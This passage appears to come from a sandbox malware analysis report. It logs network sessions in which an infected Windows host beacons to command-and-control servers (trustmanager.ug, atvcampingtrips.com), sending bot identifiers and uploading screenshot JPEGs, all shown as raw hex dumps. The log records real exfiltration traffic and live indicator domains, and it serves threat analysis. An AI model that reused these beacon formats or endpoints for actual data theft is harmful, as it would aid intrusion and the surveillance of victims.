src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.541623116 CEST	19674	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.660224915 CEST	19674	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:19.686582088 CEST	19676	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.686618090 CEST	19676	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0
Aug 23, 2021 02:09:19.734637976 CEST	19676	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5 Host: trustmanager.ug Content-Length: 98665 Cache-Control: no-cache
Aug 23, 2021 02:09:19.734766006 CEST	19676	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 37 61 32 66 31 34 65 37 61 62 63 37 34 37 63 66 31 32 61 36 32 38 63 31 38 61 31 61 30 31 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------7a2f14e7abc747cf12a628c18a1a01a5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:19.734993935 CEST	19686	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:19.735207081 CEST	19690	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:19.760516882 CEST	19701	OUT	Data Raw: b5 4e da de be 21 8e 67 d4 f5 31 14 84 84 76 9e 4d ac 46 32 01 cf 38 c8 cf d4 56 4d 4a ef 95 ee 6a 9a b2 e6 5b 1d 5f c4 2d 5c db fc 41 d6 61 30 ee 55 9f a8 6c 1f ba 2b 9f 4d 66 d9 fe f2 ba 7d 46 6b 12 69 e6 b9 99 a6 b8 96 49 65 6f bc f2 31 66 3f Data Ascii: N!g1vMF28VMJj[_-\Aa0Ul+Mf}FkiIeo1f?RiVZI)UJl9B)v2Reu[9wGNMl.oc~1u7ViPyyz#qr;]f'$m\I4}:km.89P21
Aug 23, 2021 02:09:19.760550976 CEST	19706	OUT	Data Raw: 64 35 f2 cf 8b 7f e4 73 d7 7f ec 21 71 ff 00 a3 1a bd 9c 87 f8 93 f4 38 73 1f 86 26 3d 14 77 a0 57 d3 1e 48 b4 60 51 45 02 13 68 af 6a f8 0a 65 8f 4e f1 73 db e4 cc b1 40 63 da b9 3b b1 36 30 3b f3 5e 39 69 6e 6e ae 52 10 db 4b 67 9c 7b 66 bd 13 Data Ascii: d5s!q8s&=wWH`QEhjeNs@c;60;^9innRKg{fz nyPcwR*<rZ0{mR;JM_S^qk)v/]b1?Oy.2QvK<OO4VcrF GL>
Aug 23, 2021 02:09:19.760698080 CEST	19712	OUT	Data Raw: 13 14 b8 a5 02 94 0a ab 0a e3 76 d1 b6 9f 8a 31 45 85 71 9b 68 2b 52 6d a3 6d 1c a1 72 22 b4 86 3a 9f 6f a5 26 da 39 47 cc 56 29 4d 29 56 8a 52 14 a9 e4 29 4c a6 52 98 52 ae 14 a6 18 ea 5c 0b 53 2a 14 a8 ca 7b 55 c3 1d 30 a5 66 e0 68 a6 52 68 ea Data Ascii: v1Eqh+Rmmr":o&9GV)M)VR)LRR\S{U0fhRh62TF:4BJc%]1Mfm2-FVMTHJVECE2RTR`{IhisLBACDD'{inf20$#%WpzWv=N@]&x>I
Aug 23, 2021 02:09:19.760731936 CEST	19725	OUT	Data Raw: 78 06 95 e3 ed 5b 49 92 49 20 8a cd e4 75 db be 48 c9 20 7b 60 8a 8f 56 f1 d7 88 b5 98 da 2b 8b f6 8e 16 18 31 40 02 29 1e f8 e4 fe 26 bc 3c 6e 4f 8a c5 54 51 ba 50 5f d6 c7 4e 53 2a 58 1a 72 94 d5 e6 ff 00 23 d0 7c 7f e3 f8 2c ad a6 d2 34 89 84 Data Ascii: x[II uH {`V+1@)&<nOTQP_NS*Xr#\|,4L"!P+`)`{:714qRRB>4N$cx/mNr\'t#WO&/hM,}Gzm2N<iKu
Aug 23, 2021 02:09:19.786238909 CEST	19730	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
Aug 23, 2021 02:09:19.786309004 CEST	19735	OUT	Data Raw: 0f f9 05 da ff 00 df 15 e6 7f 13 34 fb 3b 2b 9b 2f b2 5b 45 06 e4 6d c2 31 8c f3 55 0a bc ee c1 25 ca 79 1d 26 29 33 4a 2b 8c f4 0f 4d f8 1b c7 8d 6f 7f ec 1c ff 00 fa 32 3a f7 5b e7 c5 be 3f bc c0 7f 5f e9 5f 26 e8 fa cd fe 83 a9 47 a8 69 b7 0d Data Ascii: 4;+/[Em1U%y&)3J+Mo2:[?__&Giwww\|Am-3oCz, S8<^aZwM=.n:RK cRWXRfh>@bT0CryW+EgZTDz@%c6aXC
Aug 23, 2021 02:09:19.786367893 CEST	19741	OUT	Data Raw: ab cc 93 a7 a7 7b 8d e1 a3 6b a9 7e 07 ca 74 b5 d1 78 b3 c1 5a b7 83 2e 2d e1 d5 3c 82 6e 03 18 da 19 37 02 17 19 ea 01 ee 2b 9c af 49 3b ab a3 91 a6 9d 98 b4 52 1a 05 31 0b 4a 28 a3 bd 30 3b 3b 2f 85 5e 34 d4 6c 2d ef 6d 74 6f 32 de e6 25 9a 27 Data Ascii: {k~txZ.-<n7+I;R1J(0;;/^4l-mto2%'T#r0O_7_@xne,{t<UK['+&u{6A$5.]Bp>kmxf6(C+ "hW`\|!}M+0>^YGF
Aug 23, 2021 02:09:19.815283060 CEST	19782	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:19.815304995 CEST	19782	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.3	49867	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:19.011663914 CEST	19465	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: atvcampingtrips.com
Aug 23, 2021 02:09:19.011687994 CEST	19465	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 47 52 e1 87 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuGR~-td1;;3tda4uJ
Aug 23, 2021 02:09:19.917362928 CEST	19884	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:19 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.3	49869	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:19.266755104 CEST	19470	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----6a7b7c2e2f57eb415274d4cc685decec Host: trustmanager.ug Content-Length: 98735 Cache-Control: no-cache
Aug 23, 2021 02:09:19.267024040 CEST	19470	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 61 37 62 37 63 32 65 32 66 35 37 65 62 34 31 35 32 37 34 64 34 63 63 36 38 35 64 65 63 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------6a7b7c2e2f57eb415274d4cc685dececContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:19.267570972 CEST	19480	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:19.267879009 CEST	19482	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:19.292821884 CEST	19491	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:19.292857885 CEST	19496	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
